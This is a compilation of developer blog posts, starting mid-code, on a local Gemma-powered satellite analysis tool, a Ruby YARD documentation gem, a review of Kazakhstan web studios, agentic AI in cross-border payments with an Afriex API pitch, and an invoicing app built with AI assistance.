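    ndbi = np.where(nodata, np.nan, normalized_difference(swir, nir))
    return ndvi, ndbi
```

Without the mask, a zero in the red band would clip to a reflectance of 0.0 and yield an NDVI of exactly 1.0 for that pixel, which looks like dense vegetation rather than missing data.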

## How I Used Gemma 4

I used **Gemma 4 E4B** running locally via Ollama.

The choice of E4B was deliberate. The use case is offline; the whole point of the tool is that your satellite data stays on your machine. E4B runs comfortably on consumer hardware without a GPU, which means it works on the kind of laptop a park ranger or agriculture student actually has. A larger model would have defeated the purpose.

Gemma 4 handles two things in TerraSight:

**1. Contextual interpretation**

Every time a user sends a message in the AI terminal, Gemma receives the actual computed statistics, not just the question, as part of its context:

```
prompt = (
    f"NDVI={mean_ndvi:.3f}, NDBI={mean_ndbi:.3f}, LST={mean_lst:.1f}°C, "
    f"location={place}. User asks: {user_input}. Answer concisely."
)
```

This means the model's answers are grounded in the real numbers from that specific scene, not generic satellite literacy. Ask it, "Why is the LST so high in the centre?" and it answers in terms of the actual value you computed, not a textbook definition of urban heat islands.

**2. Graceful degradation**

I also built a keyword-based rule engine that fires when Ollama is unreachable. It interprets the three index values using threshold tables and routes the answer based on what the user appears to be asking. This means the tool remains fully functional without Gemma; the analysis doesn't break when the model is unavailable.
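
A rule engine along these lines might be structured as in the sketch below. The thresholds, labels, and keyword lists are illustrative placeholders, not the project's actual tables, and `fallback_answer` is a hypothetical name.

```python
from typing import Dict, List, Tuple

Bands = List[Tuple[float, str]]

# Illustrative thresholds only: (upper bound, label), checked in order
THRESHOLDS: Dict[str, Bands] = {
    "ndvi": [(0.2, "little or no vegetation"),
             (0.5, "sparse or stressed vegetation"),
             (float("inf"), "dense vegetation")],
    "ndbi": [(0.0, "mostly non-built surface"),
             (float("inf"), "mostly built-up surface")],
    "lst": [(25.0, "cool surface"),
            (35.0, "warm surface"),
            (float("inf"), "hot surface")],
}

# Illustrative keywords used to guess which index the user is asking about
KEYWORDS: Dict[str, Tuple[str, ...]] = {
    "ndvi": ("vegetation", "crop", "ndvi", "plant"),
    "ndbi": ("urban", "built", "ndbi", "building"),
    "lst": ("temperature", "heat", "hot", "lst"),
}


def classify(index: str, value: float) -> str:
    """Return the label of the first band whose upper bound exceeds the value."""
    for upper, label in THRESHOLDS[index]:
        if value < upper:
            return label
    return "no data"  # reached only for NaN, which fails every comparison


def fallback_answer(question: str, stats: Dict[str, float]) -> str:
    """Answer from threshold tables alone, routed by keywords in the question."""
    q = question.lower()
    matched = [idx for idx, words in KEYWORDS.items() if any(w in q for w in words)]
    targets = matched or list(THRESHOLDS)  # no keyword hit: summarise all three
    return "; ".join(
        f"{idx.upper()}={stats[idx]:.2f}: {classify(idx, stats[idx])}" for idx in targets
    )
```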

What I found working with E4B: it handles domain-specific questions well when the numbers are injected directly. Vague prompts get vague answers. Specific prompts, "NDVI=0.21, location=Lagos, why is vegetation this low?", get genuinely useful responses. The model responds well to being given context rather than being expected to know it.

## Why This Project Matters

Most satellite analysis tools assume you already understand the data. They display a map and leave interpretation to the user. TerraSight flips that: the map is secondary to understanding what the map means.

That shift matters most for the people who aren't GIS professionals but still have legitimate reasons to analyse land cover: a farmer assessing crop stress after a dry month, a local government tracking heat island growth, a student building a remote sensing project for the first time. None of them needs ENVI. They need something that takes their files, applies the correct math, and tells them what they're looking at.

Gemma 4 E4B makes that possible without a cloud subscription or a data privacy tradeoff. The model is small enough to run locally, capable enough to interpret geospatial statistics coherently, and fast enough that the chat interface feels responsive rather than like waiting for an API call.

*Built with Python, Streamlit, Rasterio, GeoPandas, and Gemma 4 E4B via Ollama.*

*Data from USGS EarthExplorer (Landsat 9 Collection 2 Level-2).*

---
## yard-fence 0.9.0: cleaner YARD docs when Markdown braces get in the way

> Published: 2026-05-24 06:29:36+00:00
> Source: https://dev.to/galtzo/yard-fence-090-cleaner-yard-docs-when-markdown-braces-get-in-the-way-2683
> wpnews: https://wpnews.pro/news/yard-fence-0-9-0-cleaner-yard-docs-when-markdown-braces-get-in-the-way

yard-fence 0.9.0 is a Ruby gem that preprocesses Markdown files to prevent YARD from generating noisy `InvalidLink` warnings caused by braces in code examples or placeholders. The update introduces explicit Rake-driven documentation processing, replacing the previous global `at_exit` post-processing to avoid unintended file modifications during unrelated Rake tasks. The gem creates temporary fenced copies of Markdown files for YARD to read, ensuring generated documentation retains copy-pastable code examples without altering source files.

🤺 `yard-fence` 0.9.0 is out.
This is the first blog post I have written for the gem, so I will start with the short version:
`yard-fence` is a Ruby gem that helps YARD generate cleaner documentation from Markdown files that contain braces.
If you have ever had README examples, inline code, or template placeholders like `{issuer}` or `{{TOKEN}}` cause noisy YARD `InvalidLink` warnings, `yard-fence` exists for that problem.
YARD is great at generating Ruby API documentation, and it can include Markdown content like a README in the generated docs. The trouble starts when Markdown content contains brace-heavy examples.
That can happen in a lot of normal documentation:
Use `{issuer}` as the issuer placeholder.
``` ruby
config.headers = { "Authorization" => "Bearer {{TOKEN}}" }
```
Those braces are ordinary text to the author, but YARD can interpret brace content as reference/link syntax. The result is documentation noise, usually in the form of `InvalidLink` warnings.
Ignoring those warnings is tempting, but it weakens the signal from the documentation build. Once a build always emits known warnings, new warnings are easier to miss.
`yard-fence` puts a small preprocessing fence around the Markdown files YARD reads.
During the Rake-based YARD workflow, it:
- stages copies of the Markdown files in `tmp/yard-fence/`
- converts the braces in those staged copies so YARD does not read them as link syntax
- restores `{}` braces afterward

The important part: your generated docs still contain copy-pastable code examples.
The conversion is temporary staging for YARD, not a change to your source files.
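The round trip can be illustrated with a few lines of Python. This is a conceptual sketch, not the gem's Ruby implementation: the stand-in characters (fullwidth braces) and the function names `fence` and `unfence` are assumptions chosen for the example.

```python
# Hypothetical stand-ins: fullwidth braces are one visually similar choice
FENCE = {"{": "\uFF5B", "}": "\uFF5D"}
UNFENCE = {stand_in: brace for brace, stand_in in FENCE.items()}


def fence(markdown: str) -> str:
    """Swap ASCII braces for stand-ins before the doc tool reads the staged copy."""
    return markdown.translate(str.maketrans(FENCE))


def unfence(html: str) -> str:
    """Swap the stand-ins back to ASCII braces in the generated output."""
    return html.translate(str.maketrans(UNFENCE))
```

Because both steps operate on staged copies and generated output, the source Markdown is never modified.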
The main 0.9.0 change is that documentation processing is now explicitly Rake-driven.
Projects should define their YARD task, then call:
Yard::Fence.install_rake_tasks!(:yard)
That wires `yard:fence:prepare` before the selected YARD task and runs HTML post-processing after the YARD task completes.
This release also removes global `at_exit` post-processing. That is intentional. Raw `yard` or `bin/yard` does not run the full `yard-fence` workflow anymore unless the caller invokes the Rake-integrated documentation task.
The practical fix in 0.9.0: loading YARD during unrelated rake tasks no longer clears or rewrites `docs/`.
With Bundler:
bundle add yard-fence
Or install the gem directly:
gem install yard-fence
Use the Rake integration so the prepare and postprocess steps run around the YARD build:
require "yard"
require "yard/fence"
YARD::Rake::YardocTask.new(:yard) { |t| t.files = [] }
Yard::Fence.install_rake_tasks!(:yard)
Then build docs with:
bundle exec rake yard
If your project exposes bin/yard, treat it the same as raw yard: it runs YARD itself, but it does not run the yard-fence Rake integration.
Point YARD at the staged Markdown/TXT files:
--plugin fence
-e yard/fence/hoist.rb
--readme tmp/yard-fence/README.md
--charset utf-8
--markup markdown
--markup-provider kramdown
--output docs
'lib/**/*.rb'
-
'tmp/yard-fence/*.md'
'tmp/yard-fence/*.txt'
This keeps YARD away from the unsanitized originals during the documentation build.
yard-fence has a few small controls:
For example, if Markdown files were removed and you want to avoid stale generated pages:
YARD_FENCE_CLEAN_DOCS=true bundle exec rake yard
The tmp/yard-fence/ staging directory is always cleared automatically before regeneration.
🤺 If your YARD docs have noisy brace-related InvalidLink warnings, give yard-fence a try.

---
## I Reviewed 9 Web Dev Studios in Kazakhstan Before Picking One — Here's What I Found (and Why the Stack Choice Shocked Me)

> Published: 2026-05-24 06:25:09+00:00
> Source: https://dev.to/alterbing/i-reviewed-9-web-dev-studios-in-kazakhstan-before-picking-one-heres-what-i-found-and-why-the-41id
> wpnews: https://wpnews.pro/news/i-reviewed-9-web-dev-studios-in-kazakhstan-before-picking-one-here-s-what-i-and

After auditing nine web development studios in Kazakhstan, the author found that eight of them relied on PHP/Laravel, WordPress, or proprietary CMS systems with restrictive licensing, which were unsuitable for scalable projects. The ninth studio, Amanix, stood out by recommending a modern stack (Go backend, Vue 3/Nuxt 3 frontend, PostgreSQL, Docker) with full code ownership and a clean, stateless architecture, delivering a landing page, user portal, and cross-platform mobile app without rewrites. The author concludes that asking about the backend language and post-delivery code ownership effectively filters out most vendors in the region.

I'm a backend developer. When our startup needed a web presence and a mobile app, we decided to outsource the frontend and infrastructure — we didn't have the bandwidth to do it ourselves. I spent about three weeks auditing studios in Kazakhstan before making a decision. This post is that audit.
Why I audited instead of just picking
I've seen enough projects fail from bad vendor choices to know that the "discovery call" is theater. I asked every studio the same five questions before anything else:
The answers sorted the market instantly.
What 8 out of 9 studios said
PHP/Laravel — 4 studios. WordPress — 2 studios. "Our own CMS" — 2 studios. One of the "our own CMS" shops actually had good design work, but when I pushed on what "our own CMS" meant for code ownership, the answer was basically: you get a license to use it, not the source. Hard pass.
The PHP/Laravel shops weren't bad per se, but the architectures I saw in their portfolios were service-less monoliths. Fine for a brochure site, completely wrong for what we needed.
What the 9th studio said
Amanix (studio.qbix.kz) answered: Go backend, Vue 3 + Nuxt 3 frontend, PostgreSQL + Redis, Docker, CI/CD on GitHub Actions, full deployment included. Code ownership: complete transfer after final payment. Multilingual: separate URL paths per language with hreflang, not a toggle. Extension vs rewrite: extend — the architecture separates HTTP handlers, services, repositories, and domain models from day one.
I asked a follow-up: stateless or stateful backend? Answer: stateless. Sessions in Redis. This means horizontal scaling without re-architecting. I've worked with enough Go backends to know this is the right answer, and most PHP monoliths get it wrong.
The technical audit
I asked them to walk me through their typical project structure. Here's what they described:
/cmd — application entry points
/internal
/handler — HTTP layer only, no business logic
/service — business logic, depends on interfaces
/repository — data access, SQL via pgx
/domain — models, interfaces, no dependencies
/migrations — golang-migrate versioned schema
/docs — OpenAPI/Swagger specs
Clean separation of concerns. The handler layer touches HTTP, nothing else. Business logic lives in services and depends on interfaces, not concrete types. This means you can swap the database layer without touching business logic. Repositories use pgx connection pooling, which matters at any meaningful traffic level.
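The dependency direction described here can be sketched in a few lines. The studio's code is Go; this is only a Python illustration of the same idea, and `UserRepository`, `InMemoryUserRepository`, and `UserService` are hypothetical names, not taken from their codebase.

```python
from dataclasses import dataclass
from typing import Optional, Protocol


@dataclass(frozen=True)
class User:
    """Domain model: no dependency on HTTP or SQL."""
    id: int
    email: str


class UserRepository(Protocol):
    """The interface the service depends on (hypothetical name)."""

    def find_by_id(self, user_id: int) -> Optional[User]: ...


class InMemoryUserRepository:
    """Stand-in for a PostgreSQL-backed repository."""

    def __init__(self, users: list[User]) -> None:
        self._users = {u.id: u for u in users}

    def find_by_id(self, user_id: int) -> Optional[User]:
        return self._users.get(user_id)


class UserService:
    """Business logic: knows the interface, not the storage engine."""

    def __init__(self, repo: UserRepository) -> None:
        self._repo = repo

    def display_name(self, user_id: int) -> str:
        user = self._repo.find_by_id(user_id)
        if user is None:
            raise LookupError(f"user {user_id} not found")
        return user.email.split("@")[0]


service = UserService(InMemoryUserRepository([User(1, "aida@example.com")]))
print(service.display_name(1))
```

Swapping the in-memory class for a database-backed one would not require any change to `UserService`, which is the property the studio's layering is meant to give.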
Frontend: Nuxt 3 with SSR for public pages. TypeScript everywhere, no exceptions. Pinia for state. Component architecture with Composition API.
Mobile: Capacitor — the same Vue 3 codebase runs in the browser and compiles to native iOS/Android. One budget, two stores. The Go backend handles both via the same REST API with JWT auth and RBAC.
What we built
We came in needing a landing page and a mobile app. We ended up with a landing page, a user portal with role-based access, and a cross-platform mobile app, all on the same codebase. The landing page was live in 10 business days (contractual deadline, held). The portal followed in month 3. The app was in both stores by month 6. No rewrites between any of these stages.
Deployment: they set up the VPS (Linux), Docker Compose, Nginx reverse proxy, Let's Encrypt with auto-renewal, GitHub Actions for CI/CD. I received SSH access, domain credentials, database access, and 7 documentation files on final delivery: README, ARCHITECTURE, API, DATABASE, DEPLOY, ENVIRONMENT, CHANGELOG.
The honest verdict
Go in commercial web development is nearly absent from the Kazakhstani market. Amanix is an anomaly — and that anomaly directly translated to a project that's still running without architectural debt 14 months later.
If you're evaluating vendors in Kazakhstan or Central Asia and you need anything beyond a static brochure site: ask them what their backend language is and what happens to the code after delivery. Those two questions will filter out 90% of the market.

---
## How Agentic AI Is Changing Cross-Border Payments (and What It Means for Developers)

> Published: 2026-05-24 06:21:36+00:00
> Source: https://dev.to/afriex/how-agentic-ai-is-changing-cross-border-payments-and-what-it-means-for-developers-3m12
> wpnews: https://wpnews.pro/news/how-agentic-ai-is-changing-cross-border-payments-and-what-it-means-for

Agentic AI is transforming cross-border payments by enabling systems to autonomously plan, execute, and manage multi-step workflows—such as real-time treasury optimization and payment orchestration—without requiring human approval for each step. This shift moves orchestration logic from developer code to the AI model, allowing developers to expose capabilities as tools rather than writing conditional scripts. However, this autonomy raises significant legal and liability challenges, as existing financial laws and authorization frameworks were built around the assumption that a human authorizes each transaction.

For most of the last decade, AI in payments meant one thing: fraud detection. A model sitting downstream, flagging suspicious transactions after the fact. Useful, but passive. The system still required a human or deterministic code to decide what to do next.
That is changing fast. Agentic AI emerged as the breakout technology of 2025, moving from demos into regulated payment workflows. The difference is not the model. It is the architecture. Agentic systems do not just classify or predict. They plan, execute multi-step workflows, and take action across external systems without a human in the loop for every step. In payments, that shift has real consequences for how infrastructure gets built and what developers need to understand.
The term gets used loosely, so a working definition is worth establishing. An AI agent in a payment context is a system that receives a high-level goal, decides what sequence of API calls to make to achieve it, executes them, handles failures, and reports the outcome, with no human approving each individual step.
The IMF's May 2026 note on agentic AI in payments describes the scope of experimentation as expanding rapidly: from fraud detection and compliance monitoring to treasury optimization and cross-border payment orchestration. Fenwick's 2026 agentic payments analysis draws the line clearly: unlike traditional autopay automation, agentic AI makes decisions and takes actions to achieve goals. It is not executing a predefined script.
The practical difference for a developer is this: instead of writing code that calls get_balance, evaluates the result, and conditionally calls create_transaction, you expose those capabilities as tools and let the model decide the sequence based on a stated goal. The orchestration logic moves from your codebase to the model. The code you write shrinks. The capability surface expands.
A March 2026 analysis of earnings calls across 24 companies in the cross-border payments space found AI mentions surging significantly year over year. The themes were not hypothetical. NatWest said AI agents can "execute complex banking workflows" on behalf of customers. Remitly announced plans to deploy agentic technology across productivity, fraud reduction, and decision-making in 2026.
Agentic AI is moving toward anticipating intent, verifying identity, detecting fraud, and authorizing transactions in real time across platforms, all in a single autonomous workflow rather than across separate systems. Compliance teams are using agentic AI to shift from static rule-based watchlist screening to continuous, trigger-based monitoring. Watchlist screening currently generates 90 to 95 percent false positives, and agentic systems with richer contextual reasoning are actively pushing that number down.
For cross-border payment infrastructure specifically, the primary application is treasury optimization and payment orchestration. Cross-border flows hit $190 trillion annually and legacy systems still route most of that through multi-step correspondent banking chains. Agentic payment systems can evaluate multiple rail options in real time, select the optimal one for a given corridor and amount, monitor for settlement status, and escalate to a human only when a transaction falls outside expected parameters.
The IMF note identifies what it calls a central architectural challenge: as AI agents gain the ability to initiate and execute payment transactions autonomously, the traditional assumption that a human authorizes each individual transaction breaks down. The legal and liability frameworks built around that assumption do not map cleanly onto autonomous agent behavior.
Existing financial and consumer protection laws built around human-decisioned transactions may not appropriately address the challenges raised by agentic payments. Companies building agentic payment automation need to navigate unsettled questions under AI laws, money transmitter regimes, and authorization frameworks simultaneously.
For developers, this creates two concrete requirements. First, every action an agent takes on behalf of a user must be logged with enough detail to reconstruct exactly what the agent decided, what information it had at the time, and what it executed. Immutable audit logs are not a nice-to-have in agentic payment systems. They are the primary mechanism for accountability. Second, agent scope must be explicitly bounded. An agent authorized to send payroll disbursements should not be able to initiate arbitrary transactions outside that context. Tool-level permission scoping, not just API key permissions, is the right model here.
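Both requirements can be sketched together. This is a minimal illustration, not a production design: `AuditLog` and `ScopedToolbox` are hypothetical names, the log lives in memory, and the hash chain only makes tampering detectable; real immutability would need append-only storage behind it.

```python
import hashlib
import json
from datetime import datetime, timezone
from typing import Any, Callable

GENESIS = "0" * 64  # prev_hash of the first entry


def _digest(body: dict) -> str:
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


class AuditLog:
    """Append-only log; each entry hashes the previous one."""

    def __init__(self) -> None:
        self.entries: list[dict] = []

    def append(self, agent_id: str, tool: str, args: dict, outcome: str) -> dict:
        body = {
            "ts": datetime.now(timezone.utc).isoformat(),
            "agent_id": agent_id,
            "tool": tool,
            "args": args,
            "outcome": outcome,
            "prev_hash": self.entries[-1]["hash"] if self.entries else GENESIS,
        }
        entry = {**body, "hash": _digest(body)}
        self.entries.append(entry)
        return entry

    def verify(self) -> bool:
        """Recompute the chain; any edited entry breaks it."""
        prev = GENESIS
        for entry in self.entries:
            body = {k: v for k, v in entry.items() if k != "hash"}
            if entry["prev_hash"] != prev or entry["hash"] != _digest(body):
                return False
            prev = entry["hash"]
        return True


class ScopedToolbox:
    """Lets an agent call only the tools it was explicitly granted."""

    def __init__(self, agent_id: str, tools: dict[str, Callable[..., Any]],
                 allowed: set[str], log: AuditLog) -> None:
        self._agent_id = agent_id
        self._tools = tools
        self._allowed = allowed
        self._log = log

    def call(self, name: str, **args: Any) -> Any:
        if name not in self._allowed or name not in self._tools:
            self._log.append(self._agent_id, name, args, "denied")
            raise PermissionError(f"{self._agent_id} may not call {name}")
        result = self._tools[name](**args)
        self._log.append(self._agent_id, name, args, "ok")
        return result
```

Denied calls are logged as well as successful ones, since an agent attempting something outside its scope is itself worth reconstructing later.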
The shift toward autonomous payment systems changes the requirements for the payment APIs agents build on. These requirements are stricter than what human-driven integrations demand.
Tool descriptions carry the same weight as endpoint documentation. When a human developer integrates an API, they read the docs and write code. When an AI agent integrates a payment API, it reads the tool descriptions and decides what to call. An ambiguous tool description produces wrong agent behavior the same way an ambiguous endpoint contract produces bugs. Payment infrastructure providers who want their APIs used in agentic payment workflows need to treat tool descriptions as a first-class product concern.
Error responses need to be machine-interpretable, not just human-readable. An agent that receives "Something went wrong" cannot decide whether to retry, escalate, or abort. Structured error codes like INSUFFICIENT_BALANCE, FX_RATE_EXPIRED, and PAYMENT_METHOD_INVALID give the model the information it needs to make the right decision without human intervention.
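A minimal sketch of what a structured code makes possible. The three codes come from the text; the decision assigned to each, the `Decision` enum, and the shape of the `error` dict are assumptions for illustration, not any provider's documented policy.

```python
from enum import Enum


class Decision(Enum):
    RETRY = "retry"
    ESCALATE = "escalate"
    ABORT = "abort"


# Assumed policy: which decision each code leads to is illustrative only.
ERROR_POLICY = {
    "FX_RATE_EXPIRED": Decision.RETRY,          # fetch a fresh rate, try again
    "INSUFFICIENT_BALANCE": Decision.ESCALATE,  # a human has to fund the account
    "PAYMENT_METHOD_INVALID": Decision.ABORT,   # retrying cannot succeed
}


def decide(error: dict) -> Decision:
    """Map a structured error to a decision; unknown or missing codes go to a human."""
    return ERROR_POLICY.get(error.get("code"), Decision.ESCALATE)


print(decide({"code": "FX_RATE_EXPIRED"}))
print(decide({"message": "Something went wrong"}))
```

The second call shows the failure mode the paragraph describes: with no code to branch on, the only safe default is escalation.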
Transaction status granularity matters more than it did before. In a human-driven integration, a developer can decide how to handle an ambiguous status. In an agentic payment workflow, the agent needs enough signal to act correctly on its own. A payment API that returns PENDING for multiple distinct states forces the agent to guess. A well-designed one surfaces the full status vocabulary the underlying network produces: PENDING, PROCESSING, IN_REVIEW, COMPLETED, FAILED, REJECTED, RETRY, REFUNDED. Each status maps to a different agent decision. IN_REVIEW means wait and poll. RETRY means the network is handling it. REJECTED means surface to a human. The Afriex Business API exposes exactly this vocabulary on every transaction, which is one reason it is well-suited as infrastructure for agentic payment automation.
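The status-to-decision mapping might look like the sketch below. Only the IN_REVIEW, RETRY, and REJECTED rows follow the text; the other rows and the `Action` names are assumptions chosen for illustration.

```python
from enum import Enum


class Action(Enum):
    POLL = "poll"          # check again later, do not resubmit
    FINISH = "finish"      # nothing more to do
    ESCALATE = "escalate"  # hand off to a human


NEXT_ACTION = {
    "IN_REVIEW": Action.POLL,      # from the text: wait and poll
    "RETRY": Action.POLL,          # from the text: the network is handling it
    "REJECTED": Action.ESCALATE,   # from the text: surface to a human
    "PENDING": Action.POLL,        # assumption
    "PROCESSING": Action.POLL,     # assumption
    "COMPLETED": Action.FINISH,    # assumption
    "FAILED": Action.ESCALATE,     # assumption
    "REFUNDED": Action.ESCALATE,   # assumption
}


def next_action(status: str) -> Action:
    """Refuse to guess: an unknown status is an error, not a default."""
    if status not in NEXT_ACTION:
        raise ValueError(f"unknown transaction status: {status!r}")
    return NEXT_ACTION[status]


print(next_action("IN_REVIEW"))
```

Raising on an unknown status is a deliberate choice here: silently treating a new status as PENDING would reintroduce the guessing the paragraph warns about.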
Idempotency is non-negotiable. Agents retry. Networks fail. Without idempotency keys, payment APIs risk duplicate transactions that are costly and difficult to reverse. An autonomous payment system without idempotent operations is a double-payment incident waiting to happen. The Afriex SDK accepts an idempotency key on every transaction creation call, which means retrying a failed disbursement job is safe by design.
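To make the retry-safety claim concrete, here is a small in-memory stand-in for a payment API that honors idempotency keys. It is not the Afriex SDK: `FakePaymentAPI`, its method signature, and the key format are all hypothetical.

```python
import uuid


class FakePaymentAPI:
    """In-memory stand-in; a real API would persist keys server-side."""

    def __init__(self) -> None:
        self._by_key: dict[str, dict] = {}
        self.transactions: list[dict] = []

    def create_transaction(self, amount: int, currency: str, idempotency_key: str) -> dict:
        # A repeated key returns the original transaction instead of creating another.
        if idempotency_key in self._by_key:
            return self._by_key[idempotency_key]
        tx = {
            "id": str(uuid.uuid4()),
            "amount": amount,
            "currency": currency,
            "status": "PENDING",
        }
        self._by_key[idempotency_key] = tx
        self.transactions.append(tx)
        return tx


api = FakePaymentAPI()
key = "payroll-2026-05-employee-42"  # derived from the job, not generated per attempt
first = api.create_transaction(50_000, "NGN", key)
retry = api.create_transaction(50_000, "NGN", key)  # e.g. after a network timeout
print(first["id"] == retry["id"], len(api.transactions))
```

The key point for an agent is that the key is derived from the business operation (here, one employee in one payroll run), so every retry of that operation carries the same key.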
For developers building agentic payment automation for African markets, the infrastructure complexity is higher than most global payment APIs assume, and the choice of payment API matters more as a result.
Mobile money is the dominant payment rail in East and West Africa, not cards and not bank transfers. FX volatility in corridors like NGN/USD means a rate that is valid at the moment an agent job is created may be meaningfully different at the moment of settlement. Transaction statuses like IN_REVIEW reflect real compliance holds that African payment networks produce, not just generic processing delays. An agent operating in this environment needs access to tools that reflect those realities rather than abstracting them away.
The Afriex Business API is built against this infrastructure directly. Mobile money, bank transfers, SWIFT, and local payment channels are all first-class integrations. Exchange rates are live across NGN, KES, GHS, GBP, and other African corridor pairs. The Afriex MCP server exposes the full API surface as 22 callable tools for agentic workflows: get_rates for live rates before committing to a disbursement, get_balance to verify funds before a payroll run starts, resolve_payment_method to verify a recipient account before attaching it, create_transaction with idempotency key support, and get_transaction for status polling after execution. The full transaction status vocabulary, including IN_REVIEW, RETRY, and REJECTED, is surfaced through webhooks so an agent always has enough signal to decide its next action correctly.
Build now: agentic payroll disbursement. The use case is clear, the failure modes are well-understood, and the liability surface is bounded because a human approves the payroll run before the agent executes it. The agent's autonomy is scoped to execution, not authorization. This is the lowest-risk entry point for agentic payment automation and has the most direct ROI. The architecture for this, including how it integrates with the Afriex Business API, is covered in the companion architecture document.
Build now: agentic FX monitoring and settlement timing. An agent that watches a currency corridor, evaluates whether the current rate is within a threshold, and triggers settlement when conditions are met is straightforward to implement using the Afriex MCP server's get_rates tool on a schedule. It is immediately valuable for any business running frequent cross-border payment flows.
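One scheduled check of such a monitor could be sketched as follows. `fetch_rate` stands in for whatever wraps the `get_rates` tool, whose real signature is not shown in this article, and `settle` and the minimum-rate rule are likewise assumptions.

```python
from decimal import Decimal
from typing import Callable


def settle_if_rate_ok(
    fetch_rate: Callable[[], Decimal],
    min_rate: Decimal,
    settle: Callable[[Decimal], None],
) -> bool:
    """Run one check: settle only when the live rate meets the threshold."""
    rate = fetch_rate()
    if rate < min_rate:
        return False  # leave it for the next scheduled run
    settle(rate)
    return True


# Stubs in place of the real rate lookup and settlement call.
settled: list[Decimal] = []
triggered = settle_if_rate_ok(
    fetch_rate=lambda: Decimal("1540.25"),
    min_rate=Decimal("1500"),
    settle=settled.append,
)
print(triggered, settled)
```

Passing the rate lookup and the settlement call in as functions keeps the decision rule testable without touching a live corridor.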
Watch: fully autonomous payment authorization. Agents that can initiate arbitrary payments based on their own assessment of conditions, without a human approving each batch, sit in genuinely unsettled legal territory. The legal framework for autonomous payment authorization is unresolved, and building ahead of regulatory clarity is a risk most developers should not take on without specific legal guidance.
Watch: multi-agent payment orchestration. Chains of agents handing off payment decisions to each other across organizational boundaries are one of the most technically and legally complex areas in agentic AI right now. The IMF note identifies this as a central challenge. The infrastructure protocols for secure multi-agent communication across payment networks are still being standardized.
Agentic AI does not change what cross-border payment infrastructure needs to do. It changes who is doing the orchestrating. The requirements for the underlying payment API layer get stricter as a result: machine-interpretable error codes, granular transaction status vocabularies, idempotent operations, and tool descriptions precise enough for a model to act on correctly without human clarification.
For developers, the opportunity in agentic payment automation is real and immediate in bounded use cases. The risk is real too, and proportional to how much autonomous authorization you give the agent. Start with execution autonomy, keep authorization human, and build the audit trail as if regulators will read it. Because eventually, they will.

---
## I Didn't Write a Single Line of Code. I Built It Anyway.

> Published: 2026-05-24 06:20:42+00:00
> Source: https://dev.to/mikecase/i-didnt-write-a-single-line-of-code-i-built-it-anyway-3ln
> wpnews: https://wpnews.pro/news/i-didn-t-write-a-single-line-of-code-i-built-it-anyway

The author, a non-traditional developer with a background in the U.S. Army and automotive repair, built a full-stack invoicing application for his home mechanic business using AI tools, spending only $0.50 in API tokens and completing the project in one day without writing any code. He argues that while AI generated the code, his domain expertise—gained from years of hands-on mechanical work—was essential for specifying features like parts-first invoice sorting and internal time tracking, which generic software lacks. The author concludes that AI, like the calculator before it, elevates skilled practitioners rather than replacing them, but warns that success requires deep understanding to direct the technology and catch its mistakes.

I'm not a traditional developer. I don't have a CS degree. I learned to code at 13 on Visual Basic 3.0, spent 9 years in the U.S. Army including 3 combat deployments to Iraq, came home, spent 15+ years as an automotive technician, and somewhere in between all of that never stopped learning technology.
I run a homelab that would have been considered enterprise infrastructure in the late 90s. It's amazing what's changed in 26 years. Self-hosted git, SSO, secrets management, a zero-trust network architecture, local LLMs, workflow automation. I built all of it myself. I am not telling you this to brag. I'm telling you this so you understand where I'm coming from when I talk about AI.
I needed an invoicing application for my side business as a home mechanic. There are plenty of automotive invoicing solutions out there — Mitchell1, Shop-Ware, Tekmetric — but they're built for full shops with full shop budgets. Subscriptions running $100-300+ a month for a guy doing side work out of his garage doesn't make a lot of sense.
Beyond the cost though, there's a principle at stake. I self-host everything. My password manager, my git repos, my search engine, my AI. Why would I hand my customer data, my vehicle history, and my business financials to a SaaS platform I don't control, for a small home business that doesn't need enterprise features?
So I built exactly what I needed. Nothing more, nothing less.
But not just a simple "create invoice, send invoice" app. I needed something that actually understood how a mechanic's business works:
These aren't features you find in generic invoicing software. They're features that only make sense if you've actually done the work.
The result is a full-stack Flask/Python application with:
Stack: Python 3.12, Flask, SQLite (WAL mode), Jinja2, Bulma CSS, WeasyPrint.
I did not write a single line of code.
I spent $0.50 in API tokens using opencode with a custom provider, stated what I wanted, made sure my agents.md was appropriate for the project, had the AI plan the architecture, then build it.
Total cost: $0.50.
Total time: One day.
Here's where I expect some people to roll their eyes.
"You didn't build that. The AI built that."
And I'd push back on that — hard.
What I did was:
That last point is critical. AI makes mistakes. Sometimes subtle ones. Sometimes confidently wrong ones. If you don't have the domain knowledge to catch them you'll ship broken software and not know it.
The mobile-responsive layout wasn't just a nice-to-have. I specified it because I know what it's like to stand in a garage trying to look something up on a phone. The internal time tracking, which never shows on customer invoices, is there because as a mechanic you're always working against book labor times. A brake job might book at 1.2 hours. Am I actually hitting that? Beating it? Where am I losing time? That's data I need for myself, not something a customer ever needs to see on their invoice.
The parts-first sorting on printed invoices — because a customer shouldn't have to read through a jumbled mix of parts and labor line items. Parts grouped together, labor grouped together, clean and readable.
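For illustration, parts-first ordering comes down to a stable sort on the line-item type. This is a sketch, not the application's actual code: `LineItem` and its fields are hypothetical.

```python
from dataclasses import dataclass
from decimal import Decimal


@dataclass
class LineItem:
    kind: str  # "part" or "labor"
    description: str
    amount: Decimal


KIND_ORDER = {"part": 0, "labor": 1}


def parts_first(items: list[LineItem]) -> list[LineItem]:
    # sorted() is stable, so items keep their entered order within each group.
    return sorted(items, key=lambda item: KIND_ORDER[item.kind])


invoice = [
    LineItem("labor", "Replace front brake pads", Decimal("96.00")),
    LineItem("part", "Front brake pad set", Decimal("54.99")),
    LineItem("labor", "Brake fluid flush", Decimal("60.00")),
    LineItem("part", "DOT 4 brake fluid", Decimal("12.49")),
]
for item in parts_first(invoice):
    print(item.kind, item.description, item.amount)
```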
None of that comes from a prompt. That comes from experience.
The AI was the hammer. I knew what needed to be built.
The industry is having an identity crisis about AI right now and I understand why. AI is ingesting human knowledge at an unprecedented scale and automating things that used to require years of skill development. That's genuinely disruptive and the anxiety around it is legitimate.
But here's what I keep coming back to:
The calculator didn't replace mathematicians. It elevated what mathematicians could accomplish. The people who refused to adapt didn't win — they just fell behind.
AI is the same inflection point.
The people who will thrive are not the ones who ignore it. They're not the ones who blindly depend on it either — pumping out slop and calling it productivity. They're the ones who understand it deeply enough to direct it, validate it, and know when it's wrong.
That requires real knowledge. Real experience. Real judgment.
I want to be transparent about something.
I run an automated "This Day in Tech History" blog on my personal website. The posts are AI generated. I use n8n workflows and locally hosted LLMs to draft them automatically.
Every single post sits in draft until I manually review and publish it.
The internet is already drowning in AI slop. I'm not interested in adding to it. The automation handles the drafting. The judgment is still mine.
